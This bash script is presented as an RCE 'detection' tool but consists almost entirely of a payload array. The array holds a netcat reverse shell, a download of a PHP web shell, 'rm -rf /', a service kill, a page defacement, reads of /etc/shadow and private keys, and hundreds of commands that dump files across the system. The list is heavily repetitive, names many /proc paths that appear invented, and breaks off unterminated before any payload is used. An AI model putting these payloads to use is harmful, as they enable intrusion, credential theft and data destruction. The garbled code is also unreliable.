#!/bin/bash
# This is a comment

# Function to extract domain from URL
extract_domain() {
    url=$1
    # Remove protocol
    domain=${url#*://}
    # Remove path
    domain=${domain%%/*}
    echo "$domain"
}

# Function to perform RCE detection
detect_rce() {
    echo "Detecting RCE vulnerabilities..."
    target_domain=$(extract_domain "$1")
    echo "Target domain: $target_domain"

    # Define RCE payloads using the extracted domain
    payloads=(
        "ping -c 1 $target_domain" 
        "echo 'Vulnerable' > /tmp/rce_vulnerable.txt"
        "wget -O /tmp/rce_shell.php http://$target_domain/rce_shell.php"
        "nc -e /bin/bash $target_domain 1234"
        "echo 'test' | mail -s 'Test' attacker@$target_domain"
        "ping -c 1 $target_domain" 
        "echo 'Vulnerable' > /tmp/rce_vulnerable.txt"
        "wget -O /tmp/rce_shell.php http://$target_domain/rce_shell.php"
        "nc -e /bin/bash $target_domain 1234"
        "echo 'test' | mail -s 'Test' attacker@$target_domain"
        # Additional payloads:
        "touch /tmp/rce_test_file"
        "echo 'RCE test' > /tmp/rce_test_file"
        "id"
        "uname -a"
        "ls -la"
        "cat /etc/passwd"
        "cat /etc/hosts"
        "ifconfig"
        "netstat -an"
        "whoami"
        "ps aux"
        "killall -9 httpd"
        "rm -rf /"
        "echo 'Attack successful' > /var/www/html/index.html"
        "curl -s http://$target_domain/command_to_execute"
        "find / -name '*.php'"
        "find / -name '*.sh'"
        "find / -name '*.pl'"
        "find / -name '*.cgi'"
        "find / -name '*.py'"
        "find / -name '*.rb'"
        "find / -name '*.js'"
        "find / -name '*.html'"
        "find / -name '*.htm'"
        "find / -name '*.jsp'"
        "find / -name '*.jspx'"
        "find / -name '*.asp'"
        "find / -name '*.aspx'"
        "find / -name '*.cfm'"
        "find / -name '*.cgi'"
        "find / -name '*.do'"
        "find / -name '*.action'"
        "find / -name '*.dll'"
        "find / -name '*.exe'"
        "find / -name '*.dll'"
        "find / -name '*.sh'"
        "find / -name '*.txt'"
        "find / -name '*.conf'"
        "find / -name '*.config'"
        "find / -name '*.yml'"
        "find / -name '*.yaml'"
        "find / -name '*.xml'"
        "find / -name '*.json'"
        "find / -name '*.ini'"
        "find / -name '*.htaccess'"
        "find / -name '*.passwd'"
        "find / -name '*.htpasswd'"
        "find / -name '*.bak'"
        "find / -name '*.backup'"
        "find / -name '*.sql'"
        "find / -name '*.mdb'"
        "find / -name '*.pg'"
        "find / -name '*.sqlite'"
        "find / -name '*.bak'"
        "find / -name '*.backup'"
        "find / -name '*.zip'"
        "find / -name '*.tar'"
        "find / -name '*.gz'"
        "find / -name '*.rar'"
        "find / -name '*.7z'"
        "find / -name '*.conf'"
        "find / -name '*.db'"
        "find / -name '*.pem'"
        "find / -name '*.key'"
        "find / -name '*.crt'"
        "find / -name '*.cer'"
        "find / -name '*.csr'"
        "find / -name '*.md5'"
        "find / -name '*.sha1'"
        "find / -name '*.sha256'"
        "find / -name '*.sha512'"
        "find / -name '*.pgp'"
        "find / -name '*.asc'"
        "find / -name '*.enc'"
        "find / -name '*.cert'"
        "find / -name '*.tgz'"
        "find / -name '*.xlsx'"
        "find / -name '*.xls'"
        "find / -name '*.csv'"
        "find / -name '*.doc'"
        "find / -name '*.docx'"
        "find / -name '*.pdf'"
        "find / -name '*.txt'"
        "find / -name '*.log'"
        "find / -name '*.db'"
        "find / -name '*.sqlite'"
        "find / -name '*.mdb'"
        "find / -name '*.accdb'"
        "uname -r"
        "last"
        "w"
        "grep -i password /etc/shadow"
        "grep -i password /etc/passwd"
        "grep -B3 'BEGIN RSA PRIVATE KEY' /etc/*"
        "grep -B3 'BEGIN RSA PRIVATE KEY' /var/*"
        "grep -B3 'BEGIN RSA PRIVATE KEY' /usr/*"
        "grep -B3 'BEGIN RSA PRIVATE KEY' /home/*"
        "find / -name '*.bak' -exec cat {} \;"
        "find / -name '*.backup' -exec cat {} \;"
        "find / -name '*.sql' -exec cat {} \;"
        "find / -name '*.txt' -exec cat {} \;"
        "find / -name '*.conf' -exec cat {} \;"
        "find / -name '*.config' -exec cat {} \;"
        "find / -name '*.log' -exec cat {} \;"
        "find / -name '*.ini' -exec cat {} \;"
        "find / -name '*.properties' -exec cat {} \;"
        "find / -name '*.xml' -exec cat {} \;"
        "find / -name '*.json' -exec cat {} \;"
        "find / -name '*.yaml' -exec cat {} \;"
        "find / -name '*.yml' -exec cat {} \;"
        "find / -name '*.php' -exec cat {} \;"
        "find / -name '*.jsp' -exec cat {} \;"
        "find / -name '*.asp' -exec cat {} \;"
        "find / -name '*.aspx' -exec cat {} \;"
        "find / -name '*.dll' -exec cat {} \;"
        "find / -name '*.exe' -exec cat {} \;"
        "find / -name '*.sh' -exec cat {} \;"
        "find / -name '*.pl' -exec cat {} \;"
        "find / -name '*.py' -exec cat {} \;"
        "find / -name '*.rb' -exec cat {} \;"
        "find / -name '*.cgi' -exec cat {} \;"
        "find / -name '*.do' -exec cat {} \;"
        "find / -name '*.action' -exec cat {} \;"
        "find / -name '*.war' -exec cat {} \;"
        "find / -name '*.jar' -exec cat {} \;"
        "find / -name '*.zip' -exec cat {} \;"
        "find / -name '*.tar' -exec cat {} \;"
        "find / -name '*.gz' -exec cat {} \;"
        "find / -name '*.tgz' -exec cat {} \;"
        "find / -name '*.xz' -exec cat {} \;"
        "find / -name '*.bz2' -exec cat {} \;"
        "find / -name '*.lzma' -exec cat {} \;"
        "find / -name '*.lzip' -exec cat {} \;"
        "find / -name '*.zst' -exec cat {} \;"
        "find / -name '*.avi' -exec cat {} \;"
        "find / -name '*.mp4' -exec cat {} \;"
        "find / -name '*.mov' -exec cat {} \;"
        "find / -name '*.mp3' -exec cat {} \;"
        "find / -name '*.wav' -exec cat {} \;"
        "find / -name '*.ogg' -exec cat {} \;"
        "find / -name '*.flac' -exec cat {} \;"
        "find / -name '*.jpg' -exec cat {} \;"
        "find / -name '*.jpeg' -exec cat {} \;"
        "find / -name '*.png' -exec cat {} \;"
        "find / -name '*.gif' -exec cat {} \;"
        "find / -name '*.bmp' -exec cat {} \;"
        "find / -name '*.svg' -exec cat {} \;"
        "find / -name '*.tif' -exec cat {} \;"
        "find / -name '*.tiff' -exec cat {} \;"
        "find / -name '*.ico' -exec cat {} \;"
        "find / -name '*.doc' -exec cat {} \;"
        "find / -name '*.docx' -exec cat {} \;"
        "find / -name '*.ppt' -exec cat {} \;"
        "find / -name '*.pptx' -exec cat {} \;"
        "find / -name '*.xls' -exec cat {} \;"
        "find / -name '*.xlsx' -exec cat {} \;"
        "find / -name '*.pdf' -exec cat {} \;"
        "find / -name '*.odt' -exec cat {} \;"
        "find / -name '*.ods' -exec cat {} \;"
        "find / -name '*.odp' -exec cat {} \;"
        "find / -name '*.rtf' -exec cat {} \;"
        "find / -name '*.txt' -exec cat {} \;"
        "find / -name '*.csv' -exec cat {} \;"
        "find / -name '*.ini' -exec cat {} \;"
        "find / -name '*.conf' -exec cat {} \;"
        "find / -name '*.cfg' -exec cat {} \;"
        "find / -name '*.log' -exec cat {} \;"
        "find / -name '*.bak' -exec cat {} \;"
        "find / -name '*.backup' -exec cat {} \;"
        "find / -name '*.old' -exec cat {} \;"
        "find / -name '*.temp' -exec cat {} \;"
        "find / -name '*.swp' -exec cat {} \;"
        "find / -name '*.lock' -exec cat {} \;"
        "find / -name '*.zip' -exec cat {} \;"
        "find / -name '*.tar' -exec cat {} \;"
        "find / -name '*.gz' -exec cat {} \;"
        "find / -name '*.bz2' -exec cat {} \;"
        "find / -name '*.xz' -exec cat {} \;"
        "find / -name '*.Z' -exec cat {} \;"
        "find / -name '*.rpm' -exec cat {} \;"
        "find / -name '*.deb' -exec cat {} \;"
        "find / -name '*.rmp' -exec cat {} \;"
        "find / -name '*.jar' -exec cat {} \;"
        "find / -name '*.war' -exec cat {} \;"
        "find / -name '*.ear' -exec cat {} \;"
        "find / -name '*.tar.gz' -exec cat {} \;"
        "find / -name '*.tar.bz2' -exec cat {} \;"
        "find / -name '*.tar.xz' -exec cat {} \;"
        "find / -name '*.tar.Z' -exec cat {} \;"
        "find / -name '*.tar.gz2' -exec cat {} \;"
        "find / -name '*.tar.lz' -exec cat {} \;"
        "find / -name '*.tar.lzma' -exec cat {} \;"
        "find / -name '*.tar.xz' -exec cat {} \;"
        "find / -name '*.tar.Z' -exec cat {} \;"
        "find / -name '*.tar.zst' -exec cat {} \;"
        "cat /etc/passwd | grep -v nologin"
        "cat /etc/passwd | grep -v nologin | awk -F: '{print $1}'"
        "cat /etc/passwd | awk -F: '{print $1}'"
        "cat /etc/passwd | awk -F: '{print $1,$3,$4,$5,$6,$7}'"
        "cat /etc/passwd | awk -F: '{print $1,$2,$3,$4,$5,$6,$7}'"
        "cat /etc/passwd | cut -d: -f1"
        "cat /etc/passwd | cut -d: -f2"
        "cat /etc/passwd | cut -d: -f3"
        "cat /etc/passwd | cut -d: -f4"
        "cat /etc/passwd | cut -d: -f5"
        "cat /etc/passwd | cut -d: -f6"
        "cat /etc/passwd | cut -d: -f7"
        "cat /etc/passwd | awk -F: '{print $NF}'"
        "awk -F: '{print $1,$NF}' /etc/passwd"
        "awk -F: '{print $1,$NF}' /etc/group"
        "awk -F: '{print $1,$2}' /etc/shadow"
        "awk -F: '{print $1,$2,$3}' /etc/shadow"
        "awk -F: '{print $1,$2,$3,$4}' /etc/shadow"
        "awk -F: '{print $1,$2,$3,$4,$5}' /etc/shadow"
        "awk -F: '{print $1,$2,$3,$4,$5,$6}' /etc/shadow"
        "awk -F: '{print $1,$2,$3,$4,$5,$6,$7}' /etc/shadow"
        "grep -vE '^#' /etc/ssh/sshd_config | grep -vE '^$'"
        "cat /etc/sudoers | grep -vE '^#'"
        "cat /etc/sudoers.d/* | grep -vE '^#'"
        "cat /etc/group | grep -vE '^#'"
        "cat /etc/shadow | grep -vE '^#'"
        "cat /etc/hosts.allow"
        "cat /etc/hosts.deny"
        "cat /etc/ssh/ssh_known_hosts"
        "cat /etc/ssh/ssh_config"
        "cat /etc/ssh/sshd_config"
        "cat /etc/issue"
        "cat /etc/issue.net"
        "cat /etc/lsb-release"
        "cat /etc/os-release"
        "cat /proc/version"
        "cat /proc/cpuinfo"
        "cat /proc/meminfo"
        "cat /proc/net/*"
        "cat /proc/net/tcp"
        "cat /proc/net/udp"
        "cat /proc/net/raw"
        "cat /proc/net/icmp"
        "cat /proc/net/ip_conntrack"
        "cat /proc/net/ip_tables_names"
        "cat /proc/net/ip_tables_targets"
        "cat /proc/net/ip_tables_matches"
        "cat /proc/net/ip6_tables_names"
        "cat /proc/net/ip6_tables_targets"
        "cat /proc/net/ip6_tables_matches"
        "cat /proc/net/netfilter/*"
        "cat /proc/sys/net/ipv4/ip_forward"
        "cat /proc/sys/net/ipv6/conf/all/forwarding"
        "cat /proc/sys/net/ipv4/conf/all/accept_source_route"
        "cat /proc/sys/net/ipv4/conf/all/accept_redirects"
        "cat /proc/sys/net/ipv4/conf/all/send_redirects"
        "cat /proc/sys/net/ipv4/conf/all/secure_redirects"
        "cat /proc/sys/net/ipv4/conf/all/log_martians"
        "cat /proc/sys/net/ipv4/conf/all/arp_accept"
        "cat /proc/sys/net/ipv4/conf/all/arp_notify"
        "cat /proc/sys/net/ipv4/neigh/default/gc_thresh1"
        "cat /proc/sys/net/ipv4/neigh/default/gc_thresh2"
        "cat /proc/sys/net/ipv4/neigh/default/gc_thresh3"
        "cat /proc/sys/net/ipv4/neigh/default/gc_stale_time"
        "cat /proc/sys/net/ipv4/ip_default_ttl"
        "cat /proc/sys/net/ipv4/ip_no_pmtu_disc"
        "cat /proc/sys/net/ipv4/icmp_echo_ignore_all"
        "cat /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts"
        "cat /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses"
        "cat /proc/sys/net/ipv4/tcp_syncookies"
        "cat /proc/sys/net/ipv4/tcp_max_syn_backlog"
        "cat /proc/sys/net/ipv4/tcp_synack_retries"
        "cat /proc/sys/net/ipv4/tcp_syn_retries"
        "cat /proc/sys/net/ipv4/tcp_retries1"
        "cat /proc/sys/net/ipv4/tcp_retries2"
        "cat /proc/sys/net/ipv4/tcp_fin_timeout"
        "cat /proc/sys/net/ipv4/tcp_keepalive_time"
        "cat /proc/sys/net/ipv4/tcp_keepalive_intvl"
        "cat /proc/sys/net/ipv4/tcp_keepalive_probes"
        "cat /proc/sys/net/ipv4/tcp_keepalive_abort_interval"
        "cat /proc/sys/net/ipv4/ip_local_port_range"
        "cat /proc/sys/net/ipv4/tcp_max_tw_buckets"
        "cat /proc/sys/net/ipv4/tcp_tw_recycle"
        "cat /proc/sys/net/ipv4/tcp_tw_reuse"
        "cat /proc/sys/net/ipv4/tcp_window_scaling"
        "cat /proc/sys/net/ipv4/tcp_timestamps"
        "cat /proc/sys/net/ipv4/tcp_sack"
        "cat /proc/sys/net/ipv4/tcp_fack"
        "cat /proc/sys/net/ipv4/tcp_ecn"
        "cat /proc/sys/net/ipv4/tcp_dsack"
        "cat /proc/sys/net/ipv4/tcp_mem"
        "cat /proc/sys/net/ipv4/tcp_wmem"
        "cat /proc/sys/net/ipv4/tcp_rmem"
        "cat /proc/sys/net/ipv4/tcp_app_win"
        "cat /proc/sys/net/ipv4/tcp_adv_win_scale"
        "cat /proc/sys/net/ipv4/tcp_tw_reuse"
        "cat /proc/sys/net/ipv4/icmp_ratelimit"
        "cat /proc/sys/net/ipv4/icmp_ratemask"
        "cat /proc/sys/net/ipv4/ip_local_port_range"
        "cat /proc/sys/net/ipv4/ipfrag_high_thresh"
        "cat /proc/sys/net/ipv4/ipfrag_low_thresh"
        "cat /proc/sys/net/ipv4/ipfrag_time"
        "cat /proc/sys/net/ipv4/ip_conntrack_max"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_established"
        "cat /proc/sys/net/ipv4/ip_conntrack_udp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_icmp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_generic_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_close"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_close_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_last_ack"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_fin_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_time_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_close"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_close_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_last_ack"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_fin_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_time_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_buckets"
        "cat /proc/sys/net/ipv4/ip_conntrack_max"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_sent"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_recv"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_fin_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_close"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_close_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_last_ack"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_time_wait"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_max_retrans"
        "cat /proc/sys/net/ipv4/ip_conntrack_udp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_udp_timeout_stream"
        "cat /proc/sys/net/ipv4/ip_conntrack_icmp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_icmpv6_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_generic_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_events"
        "cat /proc/sys/net/ipv4/ip_conntrack_count"
        "cat /proc/sys/net/ipv4/ip_conntrack_checksum"
        "cat /proc/sys/net/ipv4/ip_conntrack_log_invalid"
        "cat /proc/sys/net/ipv4/ip_conntrack_max"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_loose"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_be_liberal"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_max_retrans"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_recv"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_sent"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_sent"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_recv"
        "cat /proc/sys/net/ipv4/ip_conntrack_udp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_udp_timeout_stream"
        "cat /proc/sys/net/ipv4/ip_conntrack_icmp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_icmpv6_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_generic_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_events"
        "cat /proc/sys/net/ipv4/ip_conntrack_count"
        "cat /proc/sys/net/ipv4/ip_conntrack_checksum"
        "cat /proc/sys/net/ipv4/ip_conntrack_log_invalid"
        "cat /proc/sys/net/ipv4/ip_conntrack_max"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_loose"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_be_liberal"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_max_retrans"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_recv"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_sent"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_sent"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_recv"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_sent"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_recv"
        "cat /proc/sys/net/ipv4/ip_conntrack_udp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_udp_timeout_stream"
        "cat /proc/sys/net/ipv4/ip_conntrack_icmp_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_icmpv6_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_generic_timeout"
        "cat /proc/sys/net/ipv4/ip_conntrack_events"
        "cat /proc/sys/net/ipv4/ip_conntrack_count"
        "cat /proc/sys/net/ipv4/ip_conntrack_checksum"
        "cat /proc/sys/net/ipv4/ip_conntrack_log_invalid"
        "cat /proc/sys/net/ipv4/ip_conntrack_max"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_loose"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_be_liberal"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_max_retrans"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_recv"
        "cat /proc/sys/net/ipv4/ip_conntrack_tcp_timeout_syn_sent"
        "cat /proc/net/arp"
        "cat /proc/net/dev"
        "cat /proc/net/if_inet6"
        "cat /proc/net/ifstat"
        "cat /proc/net/ip_tables_names"
        "cat /proc/net/netstat"
        "cat /proc/net/route"
        "cat /proc/net/snmp"
        "cat /proc/net/sockstat"
        "cat /proc/net/tcp"
        "cat /proc/net/udp"
        "cat /proc/net/unix"
        "cat /proc/net/wireless"
        "cat /proc/self/cmdline"
        "cat /proc/self/environ"
        "cat /proc/self/maps"
        "cat /proc/self/mounts"
        "cat /proc/self/stat"
        "cat /proc/self/status"
        "cat /proc/self/task/{pid}/cmdline"
        "cat /proc/self/task/{pid}/environ"
        "cat /proc/self/task/{pid}/maps"
        "cat /proc/self/task/{pid}/mounts"
        "cat /proc/self/task/{pid}/stat"
        "cat /proc/self/task/{pid}/status"
        "cat /proc/self/task/{pid}/exe"
        "cat /proc/sys/kernel/hostname"
        "cat /proc/sys/kernel/osrelease"
        "cat /proc/sys/kernel/version"
        "cat /proc/sys/net/core/rmem_default"
        "cat /proc/sys/net/core/rmem_max"
        "cat /proc/sys/net/core/wmem_default"
        "cat /proc/sys/net/core/wmem_max"
        "cat /proc/sys/net/ipv4/conf/all/accept_source_route"
        "cat /proc/sys/net/ipv4/conf/all/forwarding"
        "cat /proc/sys/net/ipv4/conf/default/accept_redirects"
        "cat /proc/sys/net/ipv4/conf/default/accept_source_route"
        "cat /proc/sys/net/ipv4/conf/default/rp_filter"
        "cat /proc/sys/net/ipv4/conf/default/send_redirects"
        "cat /proc/sys/net/ipv4/conf/default/secure_redirects"
        "cat /proc/sys/net/ipv4/ip_forward"
        "cat /proc/sys/net/ipv4/ip_local_port_range"
        "cat /proc/sys/net/ipv4/icmp_echo_ignore_all"
        "cat /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts"
        "cat /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses"
        "cat /proc/sys/net/ipv4/tcp_syncookies"
        "cat /proc/sys/net/ipv4/tcp_max_syn_backlog"
        "cat /proc/sys/net/ipv4/tcp_synack_retries"
        "cat /proc/sys/net/ipv4/tcp_syn_retries"
        "cat /proc/sys/net/ipv4/tcp_retries1"
        "cat /proc/sys/net/ipv4/tcp_retries2"
        "cat /proc/sys/net/ipv4/tcp_fin_timeout"
        "cat /proc/sys/net/ipv4/tcp_keepalive_time"
        "cat /proc/sys/net/ipv4/tcp_keepalive_intvl"
        "cat /proc/sys/net/ipv4/tcp_keepalive_probes"
        "cat /proc/sys/net/ipv4/tcp_keepalive_abort_interval"
        "cat /proc/sys/net/ipv4/tcp_window_scaling"
        "cat /proc/sys/net/ipv4/tcp_timestamps"
        "cat /proc/sys/net/ipv4/tcp_sack"
        "cat /proc/sys/net/ipv4/tcp_fack"
        "cat /proc/sys/net/ipv4/tcp_ecn"
        "cat /proc/sys/net/ipv4/tcp_dsack"
        "cat /proc/sys/net/ipv4/tcp_mem"
        "cat /proc/sys/net/ipv4/tcp_wmem"
        "cat /proc/sys/net/ipv4/tcp_rmem"
        "cat /proc/sys/net/ipv4/tcp_app_win"
        "cat /proc/sys/net/ipv4/tcp_adv_win_scale"
        "cat /proc/sys/net/ipv4/tcp_tw_reuse"
        "cat /proc/sys/net/ipv4/tcp_tw_recycle"
        "cat /proc/sys/net/ipv4/tcp_max_tw_buckets"
        "cat /proc/sys/net/ipv4/tcp_fin_timeout"
        "cat /proc/sys/net/ipv4/tcp_fastopen"
        "cat /proc/sys/net/ipv4/tcp_max_syn_backlog"
        "cat /proc/sys/net/ipv4/tcp_synack_retries"
        "cat /proc/sys/net/ipv4/tcp_syncookies"
        "cat /proc/sys/net/ipv4/tcp_rfc1337"
        "cat /proc/sys/net/ipv4/tcp_slow_start_after_idle"
        "cat /proc/sys/net/ipv4/tcp_abort_on_overflow"
        "cat /proc/sys/net/ipv4/tcp_low_latency"
        "cat /proc/sys/net/ipv4/tcp_workaround_signed_windows"
        "cat /proc/sys/net/ipv4/tcp_no_metrics_save"
        "cat /proc/sys/net/ipv4/tcp_mtu_probing"
        "cat /proc/sys/net/ipv4/tcp_base_mss"
        "cat /proc/sys/net/ipv4/tcp_probe_interval"
        "cat /proc/sys/net/ipv4/tcp_probe_threshold"
        "cat /proc/sys/net/ipv4/tcp_probe_max_intvl"
        "cat /proc/sys/net/ipv4/tcp_probe_max_start"
        "cat /proc/sys/net/ipv4/tcp_probe_binary"
        "cat /proc/sys/net/ipv4/tcp_probe_report"
        "cat /proc/sys/net/ipv4/tcp_probe_threshold"
        "cat /proc/sys/net/ipv4/tcp_probe_max_report"
        "cat /proc/sys/net/ipv4/tcp_probe_report_min"
        "cat /proc/sys/net/ipv4/tcp_probe_reset"
        "cat /proc/sys/net/ipv4/tcp_default_win_scale"
        "cat /proc/sys/net/ipv4/tcp_bic_fast_convergence"
        "cat /proc/sys/net/ipv4/tcp_bic_fast_convergence_collapse"
        "cat /proc/sys/net/ipv4/tcp_sack"
        "cat /proc/sys/net/ipv4/tcp_fack"
        "cat /proc/sys/net/ipv4/tcp_workaround_signed_windows"
        "cat /proc/sys/net/ipv4/tcp_slow_start_after_idle"
        "cat /proc/sys/net/ipv4/tcp_abort_on_overflow"
        "cat /proc/sys/net/ipv4/tcp_low_latency"
        "cat /proc/sys/net/ipv4/tcp_timestamps"
        "cat /proc/sys/net/ipv4/tcp_rfc1337"
        "cat /proc/sys/net/ipv4/tcp_syncookies"
        "cat /proc/sys/net/ipv4/tcp_max_syn_backlog"
        "cat /proc/sys/net/ipv4/tcp_synack_retries"
        "cat /proc/sys/net/ipv4/tcp_syn_retries"
        "cat /proc/sys/net/ipv4/tcp_retries1"
        "cat /proc/sys/net/ipv4/tcp_retries2"
        "cat /proc/sys/net/ipv4/tcp_fin_timeout"
        "cat /proc/sys/net/ipv4/tcp_keepalive_time"
        "cat /proc/sys/net/ipv4/tcp_keepalive_intvl"
        "cat /proc/sys/net/ipv4/tcp_keepalive_probes"
        "cat /proc/sys/net/ipv4/tcp_keepalive_abort_interval"
        "cat /proc/sys/net/ipv4/tcp_window_scaling"
        "cat /proc/sys/net/ipv4/tcp_tw_reuse"
        "cat /proc/sys/net/ipv4/tcp_tw_recycle"
        "cat /proc/sys/net/ipv4/tcp_max_tw_buckets"
        "cat /proc/sys/net/ipv4/tcp_congestion_control"
        "cat /proc/sys/net/ipv4/tcp_westwood"
        "cat /proc/sys/net/ipv4/tcp_no_metrics_save"
        "cat /proc/sys/net/ipv4/tcp_mtu_probing"
        "cat /proc/sys/net/ipv4/tcp_base_mss"
        "cat /proc/sys/net/ipv4/tcp_probe_interval"
        "cat /proc/sys/net/ipv4/tcp_probe_threshold"
        "cat /proc/sys/net/ipv4/tcp_probe_max_intvl"
        "cat /proc/sys/net/ipv4/tcp_probe_max_start"
        "cat /proc/sys/net/ipv4/tcp_probe_binary"
        "cat /proc/sys/net/ipv4/tcp_probe_report"
        "cat /proc/sys/net/ipv4/tcp_probe_threshold"
        "cat /proc/sys/net/ipv4/tcp_probe_max_report"
        "cat /proc/sys/net/ipv4/tcp_probe_report_min"
        "cat /proc/sys/net/ipv4/tcp_probe_reset"
        "cat /proc/sys/net/ipv4/tcp_default_win_scale"
        "cat /proc/sys/net/ipv4/tcp_bic_fast_convergence"
        "cat /proc/sys/net/ipv4/tcp_bic_fast_convergence_collapse"
        "cat /proc/sys/net/ipv4/tcp_vegas_alpha"
        "cat /proc/sys/net/ipv4/tcp_vegas_beta"
        "cat /proc/sys/net/ipv4/tcp_vegas_gamma"
        "cat /proc/sys/net/ipv4/tcp_vegas_rtt_thresh"
        "cat /proc/sys/net/ipv4/tcp_vegas_cong_avoid"
        "cat /proc/sys/net/ipv4/tcp_vegas_tso_win"
        "cat /proc/sys/net/ipv4/tcp_vegas_lt_thresh"
        "cat /proc/sys/net/ipv4/tcp_vegas_cong_ctl"
        "cat /proc/sys/net/ipv4/tcp_vegas_cwnd_min"
        "cat /proc/sys/net/ipv4/tcp_vegas_cong_signal"
        "cat /proc/sys/net/ipv4/tcp_vegas_ss_minrtt"
        "cat /proc/sys/net/ipv4/tcp_vegas_ss_maxrtt"
        "cat /proc/sys/net/ipv4/tcp_vegas_ss_flts"
        "cat /proc/sys/net/ipv4/tcp_vegas_ss_histlen"
        "cat /proc/sys/net/ipv4/tcp_vegas_dsack"
        "cat /proc/sys/net/ipv4/tcp_vegas_nflag"
        "cat /proc/sys/net/ipv4/tcp_vegas_no_quickack"
        "cat /proc/sys/net/ipv4/tcp_vegas_no_quickack_r0"
        "cat /proc/sys/net/ipv4/tcp_vegas_no_quickack_r1"
        "ls -la /etc/passwd"
        "ls -la /etc/shadow"
        "ls -la /etc/sudoers"
        "ls -la /etc/ssh/sshd_config"
        "ls -la /etc/hosts.allow"
        "ls -la /etc/hosts.deny"
        "ls -la /etc/crontab"
        "ls -la /etc/cron.d"
        "ls -la /etc/cron.daily"
        "ls -la /etc/cron.weekly"
        "ls -la /etc/cron.monthly"
        "ls -la /etc/cron.hourly"
        "ls -la /etc/security/limits.conf"
        "ls -la /etc/sysctl.conf"
        "ls -la /etc/pam.d/"
        "ls -la /etc/rsyslog.conf"
        "ls -la /etc/logrotate.conf"
        "ls -la /etc/audit/auditd.conf"
        "ls -la /etc/audit/audit.rules"
        "ls -la /etc/modprobe.conf"
        "ls -la /etc/modules"
        "ls -la /etc/profile"
        "ls -la /etc/environment"
        "ls -la /etc/bashrc"
        "ls -la /etc/login.defs"
        "ls -la /etc/group"
        "ls -la /etc/passwd"
        "ls -la /etc/hosts"
        "ls -la /etc/sudoers"
        "ls -la /etc/shells"
        "ls -la /etc/securetty"
        "ls -la /etc/services"
        "ls -la /etc/xinetd.conf"
        "ls -la /etc/inetd.conf"
        "ls -la /etc/motd"
        "ls -la /etc/issue"
        "ls -la /etc/hosts.equiv"
        "ls -la /etc/exports"
        "ls -la /etc/auto.master"
        "ls -la /etc/auto_home"
        "ls -la /etc/auto.direct"
        "ls -la /etc/fstab"
        "ls -la /etc/mtab"
        "ls -la /etc/resolv.conf"
        "ls -la /etc/hostname"
        "ls -la /etc/host.conf"
        "ls -la /etc/nsswitch.conf"
        "ls -la /etc/sysconfig/network"
        "ls -la /etc/sysconfig/network-scripts/"
        "ls -la /etc/sysconfig/networking/"
        "ls -la /etc/sysconfig/iptables"
        "ls -la /etc/sysconfig/iptables-config"
        "ls -la /etc/sysconfig/selinux"
        "ls -la /etc/sysconfig/authconfig"
        "ls -la /etc/sysconfig/clock"
        "ls -la /etc/sysconfig/keyboard"
        "ls -la /etc/sysconfig/mouse"
        "ls -la /etc/sysconfig/printer"
        "ls -la /etc/sysconfig/console"
        "ls -la /etc/sysconfig/system-config-*
        "ls -la /etc/sysconfig/hwconf
